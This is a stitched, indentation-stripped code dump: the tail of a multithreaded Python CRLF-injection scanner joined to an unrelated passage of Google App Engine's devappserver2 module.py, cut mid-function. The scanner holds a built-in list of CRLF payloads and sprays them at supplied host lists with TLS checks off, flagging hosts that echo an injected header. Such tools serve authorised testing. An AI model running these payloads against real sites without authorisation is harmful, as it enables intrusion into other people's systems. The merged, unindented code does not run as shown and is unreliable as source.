if t_exceptions[u] >= MAX_EXCEPTION:
if _verbose >= 3:
print("skip too many exceptions %s" % t_urlparse.netloc)
return
if not u in t_vulnerable:
t_vulnerable[u] = 0
if t_vulnerable[u] >= MAX_VULNERABLE:
if _verbose >= 3:
print("skip already vulnerable %s" % t_urlparse.netloc)
return
try:
if method == 'POST':
r = requests.post( url, data=post_params, headers=t_custom_headers, timeout=5, verify=False )
else:
r = requests.head( url, headers=t_custom_headers, timeout=5, verify=False )
except Exception as e:
t_exceptions[u] = t_exceptions[u] + 1
if _verbose >= 3:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
return
if 'Content-Type' in r.headers:
content_type = r.headers['Content-Type']
else:
content_type = '-'
t_headers = list( map( str.lower,r.headers.keys() ) )
if 'xcrlf' in t_headers:
vuln = 'VULNERABLE'
else:
vuln = '-'
if vuln == 'VULNERABLE':
t_vulnerable[u] = t_vulnerable[u] + 1
# output = '%sC=%d\t\tT=%s\t\tV=%s\n' % (url.ljust(t_multiproc['u_max_length']),r.status_code,content_type,vuln)
output = '%s\t\tC=%d\t\tT=%s\t\tV=%s\n' % (url,r.status_code,content_type,vuln)
fp = open( t_multiproc['f_output'], 'a+' )
fp.write( output )
fp.close()
if _verbose >= 2 or (_verbose >= 1 and vuln == 'VULNERABLE'):
if vuln == 'VULNERABLE':
sys.stdout.write( '%s%s%s' % (fg('light_red'),output,attr(0)) )
else:
sys.stdout.write( output )
# old version
# def testURL( url ):
# time.sleep( 0.01 )
# if _verbose <= 1:
# sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
# t_multiproc['n_current'] = t_multiproc['n_current'] + 1
# t_urlparse = urlparse(url)
# u = t_urlparse.scheme + '_' + t_urlparse.netloc
# if not u in t_exceptions:
# t_exceptions[u] = 0
# if t_exceptions[u] >= MAX_EXCEPTION:
# if _verbose >= 3:
# print("skip too many exceptions %s" % t_urlparse.netloc)
# return
# if not u in t_vulnerable:
# t_vulnerable[u] = 0
# if t_vulnerable[u] >= MAX_VULNERABLE:
# if _verbose >= 3:
# print("skip already vulnerable %s" % t_urlparse.netloc)
# return
# try:
# r = requests.head( url, timeout=5, verify=False )
# except Exception as e:
# t_exceptions[u] = t_exceptions[u] + 1
# if _verbose >= 3:
# sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
# return
# if 'Content-Type' in r.headers:
# content_type = r.headers['Content-Type']
# else:
# content_type = '-'
# t_headers = list( map( str.lower,r.headers.keys() ) )
# if 'xcrlf' in t_headers:
# vuln = 'VULNERABLE'
# else:
# vuln = '-'
# if vuln == 'VULNERABLE':
# t_vulnerable[u] = t_vulnerable[u] + 1
# output = '%sC=%d\t\tT=%s\t\tV=%s\n' % (url.ljust(t_multiproc['u_max_length']),r.status_code,content_type,vuln)
# fp = open( t_multiproc['f_output'], 'a+' )
# fp.write( output )
# fp.close()
# if _verbose >= 2 or (_verbose >= 1 and vuln == 'VULNERABLE'):
# sys.stdout.write( '%s' % output )
parser = argparse.ArgumentParser()
parser.add_argument( "-a","--path",help="set paths list" )
parser.add_argument( "-d","--header",help="custom headers, example: cookie1=value1;cookie2=value2...", action="append" )
parser.add_argument( "-p","--payloads",help="set payloads list" )
parser.add_argument( "-o","--hosts",help="set host list (required or -u)" )
# parser.add_argument( "-r","--redirect",help="follow redirection" )
parser.add_argument( "-s","--scheme",help="scheme to use, default=http,https" )
parser.add_argument( "-t","--threads",help="threads, default 10" )
parser.add_argument( "-u","--urls",help="set url list (required or -o)" )
parser.add_argument( "-v","--verbose",help="display output, 0=nothing, 1=only vulnerable, 2=all requests, 3=full debug, default: 1" )
parser.parse_args()
args = parser.parse_args()
if args.scheme:
t_scheme = args.scheme.split(',')
else:
t_scheme = ['http','https']
t_custom_headers = {}
if args.header:
for header in args.header:
if ':' in header:
tmp = header.split(':')
t_custom_headers[ tmp[0].strip() ] = tmp[1].strip()
t_hosts = []
if args.hosts:
if os.path.isfile(args.hosts):
fp = open( args.hosts, 'r' )
t_hosts = fp.read().strip().split("\n")
fp.close()
else:
t_hosts.append( args.hosts )
n_hosts = len(t_hosts)
sys.stdout.write( '%s[+] %d hosts found: %s%s\n' % (fg('green'),n_hosts,args.hosts,attr(0)) )
t_urls = []
if args.urls:
if os.path.isfile(args.urls):
fp = open( args.urls, 'r' )
t_urls = fp.read().strip().split("\n")
fp.close()
else:
t_urls.append( args.urls )
n_urls = len(t_urls)
sys.stdout.write( '%s[+] %d urls found: %s%s\n' % (fg('green'),n_urls,args.urls,attr(0)) )
if n_hosts == 0 and n_urls == 0:
parser.error( 'hosts/urls list missing' )
t_path = [ '' ]
if args.path:
if os.path.isfile(args.path):
fp = open( args.path, 'r' )
t_path = fp.read().strip().split("\n")
fp.close()
else:
t_path.append( args.path )
n_path = len(t_path)
sys.stdout.write( '%s[+] %d path found: %s%s\n' % (fg('green'),n_path,args.path,attr(0)) )
if args.payloads:
t_payloads = []
if os.path.isfile(args.payloads):
fp = open( args.payloads, 'r' )
t_payloads = fp.read().strip().split("\n")
fp.close()
else:
t_payloads.append( args.payloads )
n_payloads = len(t_payloads)
sys.stdout.write( '%s[+] %d payloads found: %s%s\n' % (fg('green'),n_payloads,args.payloads,attr(0)) )
else:
n_payloads = 0
if args.verbose:
_verbose = int(args.verbose)
else:
_verbose = 1
if args.threads:
_threads = int(args.threads)
else:
_threads = 10
t_totest = []
u_max_length = 0
d_output = os.getcwd()+'/crlf'
f_output = d_output + '/' + 'output'
if not os.path.isdir(d_output):
try:
os.makedirs( d_output )
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
exit()
sys.stdout.write( '%s[+] options are -> threads:%d, verbose:%d%s\n' % (fg('green'),_threads,_verbose,attr(0)) )
sys.stdout.write( '[+] computing host and payload list...\n' )
# source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
if not n_payloads:
t_payloads = [
'/%0dXcrlf%3a1',
'/%0aXcrlf%3a1',
'/%0d%0aXcrlf%3a1',
'/?%0dXcrlf%3acrlf=1',
'/%3F%0aXcrlf%3acrlf=1',
'/%0aXcrlf%3a1/..',
'/%23%0dXcrlf:1',
'/%23%0aXcrlf:1',
'/%23%0d%0aXcrlf:1',
'/xxx%0dXcrlf:1',
'/xxx%0aXcrlf:1',
'/xxx%0d%0aXcrlf:1',
'//xxx%0dXcrlf:1;',
'//xxx%0aXcrlf:1;',
'//xxx%0d%0aXcrlf:1;',
'/xxx/x%23%0dXcrlf:1',
'/xxx/x%3F%0dXcrlf:1',
'/v1/xx%20xx%0d%0aXcrlf:1',
'/api/v1/see%20below%0d%0aXcrlf:1',
'/%E5%98%8a%E5%98%8dXcrlf:1',
'/~bin/%0d%0aXcrlf:1',
]
for scheme in t_scheme:
for host in t_hosts:
for path in t_path:
u = scheme + '://' + host.strip() + path
t_totest.append( u )
l = len(u)
if l > u_max_length:
u_max_length = l
for url in t_urls:
for path in t_path:
u = url.strip() + path
t_totest.append( u )
l = len(u)
if l > u_max_length:
u_max_length = l
# old version
# for scheme in t_scheme:
# for host in t_hosts:
# for payload in t_payloads:
# for path in t_path:
# u = scheme + '://' + host.strip() + path + payload
# t_totest.append( u )
# l = len(u)
# if l > u_max_length:
# u_max_length = l
# for url in t_urls:
# for payload in t_payloads:
# for path in t_path:
# u = url.strip() + path + payload
# t_totest.append( u )
# l = len(u)
# if l > u_max_length:
# u_max_length = l
n_totest = len(t_totest)
sys.stdout.write( '%s[+] %d urls created.%s\n' % (fg('green'),n_totest,attr(0)) )
sys.stdout.write( '[+] testing...\n' )
random.shuffle(t_totest)
# print("\n".join(t_totest))
# exit()
t_exceptions = {}
t_vulnerable = {}
t_multiproc = {
'n_current': 0,
'n_total': n_totest,
'u_max_length': u_max_length+5,
'd_output': d_output,
'f_output': f_output,
}
def doWork():
while True:
url = q.get()
testURL( url )
q.task_done()
q = Queue( _threads*2 )
for i in range(_threads):
t = Thread( target=doWork )
t.daemon = True
t.start()
try:
for url in t_totest:
q.put( url )
q.join()
except KeyboardInterrupt:
sys.exit(1)
|
module.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
from __future__ import division
from builtins import zip
from builtins import str
from builtins import range
from past.utils import old_div
from builtins import object
import collections
import io
import functools
import six.moves.http_client
import logging
import math
import os.path
import random
import re
import string
import threading
import time
import six.moves.urllib.request, six.moves.urllib.parse, six.moves.urllib.error
import six.moves.urllib.parse
import wsgiref.headers
from concurrent import futures
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import gcs_server
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import health_check_service
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
import six
from six.moves import range
from six.moves import zip
try:
from google.appengine.tools.devappserver2 import java_runtime
except ImportError:
java_runtime = None
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import vm_runtime_factory
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
_MAX_UPLOAD_MEGABYTES = 32
_MAX_UPLOAD_BYTES = _MAX_UPLOAD_MEGABYTES * 1024 * 1024
_MAX_UPLOAD_NO_TRIGGER_BAD_CLIENT_BYTES = 64 * 1024 * 1024
_REDIRECT_HTML = '''\
<HTML><HEAD><meta http-equiv="content-type" content="%(content-type)s">
<TITLE>%(status)d Moved</TITLE></HEAD>
<BODY><H1>%(status)d Moved</H1>
The document has moved'
<A HREF="%(correct-url)s">here</A>.
</BODY></HTML>'''
_TIMEOUT_HTML = '<HTML><BODY>503 - This request has timed out.</BODY></HTML>'
# Factor applied to the request timeouts to compensate for the
# long vmengines reloads. TODO eventually remove that once we have
# optimized the vm_engine reload.
_VMENGINE_SLOWDOWN_FACTOR = 2
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error as e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
# TODO: uncomment for GA.
# 'vm': vm_runtime_factory.VMRuntimeInstanceFactory,
}
if java_runtime:
_RUNTIME_INSTANCE_FACTORIES.update({
'java': java_runtime.JavaRuntimeInstanceFactory,
'java7': java_runtime.JavaRuntimeInstanceFactory,
})
_MAX_REQUEST_WAIT_TIME = 10
def _get_wait_time(self):
"""Gets the wait time before timing out a request.
Returns:
The timeout value in seconds.
"""
if self.vm_enabled():
return self._MAX_REQUEST_WAIT_TIME * _VMENGINE_SLOWDOWN_FACTOR
return self._MAX_REQUEST_WAIT_TIME
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
A instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
A list of url_handler.URLHandlers corresponding that can react as
described in the given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
url_pattern = '/%s' % gcs_server.GCS_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(gcs_server.Application(), url_pattern))
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
if self._threadsafe_override is None:
runtime_config.threadsafe = self._module_configuration.threadsafe or False
else:
runtime_config.threadsafe = self._threadsafe_override
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
runtime_config.api_host = self._api_host
runtime_config.api_port = self._api_port
runtime_config.server_port = self._balanced_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
if self._max_instances is not None:
runtime_config.max_instances = self._max_instances
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in list((self._module_configuration.env_variables or {}).items()):
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._php_config and self._module_configuration.runtime == 'php':
runtime_config.php_config.CopyFrom(self._php_config)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
if (self._java_config and
self._module_configuration.runtime.startswith('java')):
runtime_config.java_config.CopyFrom(self._java_config)
if self._vm_config:
runtime_config.vm_config.CopyFrom(self._vm_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
logging.info(
'Detected file changes:\n %s', '\n '.join(sorted(file_changes)))
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=bool(file_changes))
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIModule listens for RPC requests on.
api_port: The port that APIModule listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._version = module_configuration.major_version
self._app_name_external = module_configuration.application_external_name
self._host = host
self._api_host = api_host
self._api_port = api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_config = php_config
self._python_config = python_config
self._java_config = java_config
self._cloud_sql_config = cloud_sql_config
self._vm_config = vm_config
self._request_data = request_data
self._allow_skipped_files = allow_skipped_files
self._threadsafe_override = threadsafe_override
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
self._default_version_port = default_version_port
self._port_registry = port_registry
if self.vm_enabled():
self._RUNTIME_INSTANCE_FACTORIES['vm'] = (
vm_runtime_factory.VMRuntimeInstanceFactory)
self._instance_factory = self._create_instance_factory(
self._module_configuration)
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
def vm_enabled(self):
# TODO: change when GA
return self._vm_config
@property
def name(self):
"""The name of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even in the
module configuration changes.
"""
return self._name
@property
def version(self):
"""The version of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even in the
module configuration changes.
"""
return self._version
@property
def app_name_external(self):
"""The external application name of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even in the
module configuration changes.
"""
return self._app_name_external
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def runtime(self):
"""Runtime property for this module."""
return self._module_configuration.runtime
@property
def effective_runtime(self):
"""Effective_runtime property for this module."""
return self._module_configuration.effective_runtime
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status, body=None):
if body:
start_response(
'%d %s' % (status, six.moves.http_client.responses[status]),
[('Content-Type', 'text/html'),
('Content-Length', str(len(body)))])
return body
start_response('%d %s' % (status, six.moves.http_client.responses[status]), [])
return []
def _handle_request(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst:
try:
environ['SERVER_PORT'] = str(self.get_instance_port(inst.instance_id))
except request_info.NotSupportedWithAutoScalingError:
environ['SERVER_PORT'] = str(self.balanced_port)
else:
environ['SERVER_PORT'] = str(self.balanced_port)
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], self._default_version_port)
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (six.moves.urllib.parse.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = six.moves.urllib.parse.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.major_version,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version,
module=self._module_configuration.module_name)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
content_length = int(environ.get('CONTENT_LENGTH', '0'))
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'DELETE', 'TRACE') and
content_length != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
# Do not apply request limits to internal _ah handlers (known to break
# blob uploads).
# TODO: research if _ah handlers need limits.
if (not environ.get('REQUEST_URI', '/').startswith('/_ah/') and
content_length > _MAX_UPLOAD_BYTES):
# As allowed by the RFC, cherrypy closes the connection for 413 errors.
# Most clients do not handle this correctly and treat the page as
# unavailable if the connection is closed before the client can send
# all the data. To match the behavior of production, for large files
# < 64M read the data to prevent the client bug from being triggered.
if content_length <= _MAX_UPLOAD_NO_TRIGGER_BAD_CLIENT_BYTES:
environ['wsgi.input'].read(content_length)
status = '%d %s' % (six.moves.http_client.REQUEST_ENTITY_TOO_LARGE,
six.moves.http_client.responses[six.moves.http_client.REQUEST_ENTITY_TOO_LARGE])
wrapped_start_response(status, [])
return ['Upload limited to %d megabytes.' % _MAX_UPLOAD_MEGABYTES]
with self._handler_lock:
handlers = self._handlers
try:
